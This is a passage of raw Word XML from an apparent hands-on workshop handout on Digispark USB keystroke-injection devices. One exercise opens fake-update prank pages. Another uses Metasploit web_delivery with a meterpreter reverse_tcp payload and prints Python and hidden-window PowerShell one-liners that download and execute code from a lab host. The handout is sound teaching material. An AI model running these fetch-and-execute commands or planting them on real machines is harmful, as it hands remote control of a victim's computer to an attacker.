        <w:t>DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); // meta+r</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>DigiKeyboard.delay(100);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>DigiKeyboard.sendKeyStroke(</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>76</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>); // Clean it up</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>DigiKeyboard.delay(50);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>DigiKeyboard.println("notepad.</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>exe</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>DigiKeyboard.delay(200);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">DigiKeyboard.println("Hello </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>&lt;event name here&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>!");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>4) Upload to the digispark.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>5) Once uploaded, unplug and then replug the digispark.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Results</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Did this work as expected? What could you do to improve it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="__RefHeading___Toc181_2153683434"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r>
        <w:rPr/>
        <w:t>Exercise 3 – Fake Update</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="__RefHeading___Toc183_2153683434"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r>
        <w:rPr/>
        <w:t>Aim</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">To load a web browser </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>with a preset page to</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> annoy </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> user</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="__RefHeading___Toc185_2153683434"/>
      <w:bookmarkEnd w:id="18"/>
      <w:r>
        <w:rPr/>
        <w:t>Method</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>1) Load up the blank template in to the arduino IDE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">2) In the setup section </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>add commands to sleep for 5 seconds and to open a command prompt.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>3) The next command depends on the OS you are running.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The command to run:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>OSX:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t>open -a -n safari http://fakeupdate.net/apple/index.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>or</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t>open http://fakeupdate.net/apple/index.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Windows / Linux:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
      </w:r>
      <w:bookmarkStart w:id="19" w:name="__DdeLink__1342_2519496970"/>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">firefox -fs </w:t>
      </w:r>
      <w:hyperlink r:id="rId12">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>http://fakeupdate.net/windows98/index.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Windows:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:tab/>
        <w:t>iexplore -k http://fakeupdate.net/win10u/index.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">4) Compile and deploy to the digispark, </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>replug the digispark to verify the command works.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="__RefHeading___Toc1116_152967944"/>
      <w:bookmarkEnd w:id="20"/>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Further Exercise </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Idea</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>s</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>What other commands could you run from the command line?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="__RefHeading___Toc187_2153683434"/>
      <w:bookmarkEnd w:id="21"/>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Exercise </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Web Deploy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="__RefHeading___Toc189_2153683434"/>
      <w:bookmarkEnd w:id="22"/>
      <w:r>
        <w:rPr/>
        <w:t>Aim</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Since metasploit is actually too big to fit on the digispark, the next best way is to deploy it via the Web.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="__RefHeading___Toc191_2153683434"/>
      <w:bookmarkEnd w:id="23"/>
      <w:r>
        <w:rPr/>
        <w:t>Method</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>1) Start up the metasploit Framework by typing msf</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>console</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">2) </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Run the following commands in side metasploit:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>use exploit/multi/script/web_delivery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>set LHOST &lt;your IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>if your target is running python, you should just be able to run “exploit”. If you want to use Powershell, type:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>set TARGET 2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>set PAYLOAD windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>If you are running the python version, you will get a command like this:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>python -c "import sys; u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('</w:t>
      </w:r>
      <w:hyperlink r:id="rId13">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>http://192.168.56.1:8080/At9LLfkW');exec(r.read</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr/>
        <w:t>());"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>The Powershell output looks like this:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="__DdeLink__1344_2519496970"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>powershell.exe -nop -w hidden -c $d=new-object net.webclient;$d.proxy=[Net.WebRequest]::GetSystemWebProxy();$d.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $d.downloadstring('http://192.168.56.1:8080/ZkBGVWt6qDd00E');</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>Note: if you get an error you might need to change the execution policy (i.e. enable Powershell) with set-executionpolicy unrestricted -s cu</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="__RefHeading___Toc1118_152967944"/>
      <w:bookmarkEnd w:id="25"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
        <w:t>Further Exercise Ideas</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>Host your own code for performing and executing specific tasks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="__RefHeading___Toc1120_152967944"/>
      <w:bookmarkEnd w:id="26"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
        <w:t>Exercise 5 – Random Numbers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="__RefHeading___Toc1122_152967944"/>
      <w:bookmarkEnd w:id="27"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
        <w:t>Aim</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>To introduce random numbers as can be used with the digispark. If a button was added to the device, it could be used to produce a random number on demand. Although, random numbers aren’t completely random, and shouldn’t be relied upon.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="__RefHeading___Toc1124_152967944"/>
      <w:bookmarkEnd w:id="28"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
        <w:t>Method</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t xml:space="preserve">1) Load up the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>blinkenlights sketch.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>2) Add to the setup section:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>randomSeed(42);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>3) Change the value of the delay</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>(s)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t xml:space="preserve"> to:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
